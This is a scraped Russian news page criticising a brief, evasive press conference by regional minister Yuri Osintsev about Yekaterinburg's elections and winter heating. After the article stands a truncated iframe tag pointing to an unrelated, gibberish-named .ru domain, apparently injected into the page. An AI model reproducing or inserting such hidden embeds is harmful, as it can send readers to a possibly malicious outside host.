«Вечерний Екатеринбург»: Хотел, но не смог

Вчера министр внешнеэкономических сношений, а по совместительству — «куратор Екатеринбурга» хотел дать пресс-конференцию. Тема, надо сказать, была заявлена мощная: «Попытка срыва выборов губернатора администрацией города Екатеринбурга — антигосударственная позиция».
Но, конечно, одно дело хотеть, а другое — смочь: это, как известно, две большие разницы. Сначала встречу перенесли с 13.30 на 14.00. Но министр всё равно опоздал на 15 минут. Сказал, что стоял в пробках. Хотя от его офиса, который находится почему-то в резиденции губернатора, до Дома печати, что на улице Тургенева, всего дара кварталов. Как говорится, ползком — 10 минут. Ну, да ладно.
Характерно, что Осинцев не сказал ни слова по заявленной теме, что называеся, перевёл стрелки. Цитирую дословно, без купюр: «Я думаю, что областная избирательная комиссия разберется со всеми фактами, мы все факты передали, так что теперь слово за избирательной комиссией, я думаю, она разберется с фактами, которые были противоправными». Ну, то есть для тех, кто не понял Владимира Мостовщикова, областной чиновник, а по совместительству, видимо, сурдопереводчик пояснил, мол, все вопросы не ко мне. Вместо раскрытия заявленной темы министр взял на себя ответственность за пуск тепла в Екатеринбурге: «Мы проследим, чтобы тепло появилось в домах екатеринбуржцев вовремя», — сказал он. В общем-то заявление, конечно, поражает своей новизной. Особенно в контексте того, что несколько областных чиновников — и премьер Воробьёв, и министр энергетики Штагер, и — о, чудо! — даже кардиолог Ян Габинский — все как один заверяют нас, горожан, что мерзнуть мы не будем. В то время как глава города Аркадий Чернецкий, ничего не обещая, пресс-конференций не собирая, принимает решения: выделить на подготовку к зиме дополнительные средства, на ликвидацию аварий — дополнительные бригады ремонтников...
На вопросы, интересующие представителей СМИ, вчера Осинцев так и не ответил: мероприятие длилось всего 5 минут. Он лишь попытался снять с себя ответственность за проваленную победу «кандидата №1» на выборах в Екатеринбурге.
Отвечая на вопрос о том, возглавлял ли он всё-таки предвыборный штаб «кандидата №1» в Екатеринбурге, Юрий Осинцев заявил следующее (цитирую): «В это время я находился в отпуске». После чего добавил путаную фразу: «Моя позиция по этому вопросу такова, что я выразил свою позицию в своих действиях. Я не могу сейчас об этом говорить».
Зачем тогда было собирать пресс-конференцию? Чтобы сказать, что не можешь о чём-то говорить? Детский лепет, право слово.
По словам политолога Сергея Мошкина, высказывания областного чиновника Юрия Осинцева о том, что он проконтролирует процесс включения отопления в Екатеринбурге, звучат очень странно "из уст министра по внешнеэкономическим связям.
— Областной министр просто пытается присоединиться к усилиям городской администрации, с тем чтобы впоследствии присвоить себе чужие заслуги, — говорит Сергей Мошкин. — Налицо типичное паразитирование на труде других людей. Либо г-н Осинцев плохо представляет себе собственные должностные обязанности.
Собственно, никто не будет спорить, если сказать, что министр внешнеэкономических связей должен заниматься внешнеэкономическими связями, и озаботиться, например, проблемой незаконной миграции из Китая и стран Средней Азии. Но это. ведь, наверное, скучно — заботиться? Можно же просто чего-то пообещать, ведь в кресло мэра хочется, видимо, все чаще. Но опять же, одно дело — хотеть...
<iframe src="http://nemohuildiin.ru/

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Июль 2020    »
ПнВтСрЧтПтСбВс
 12345
6789101112
13141516171819
20212223242526
2728293031 

Контакты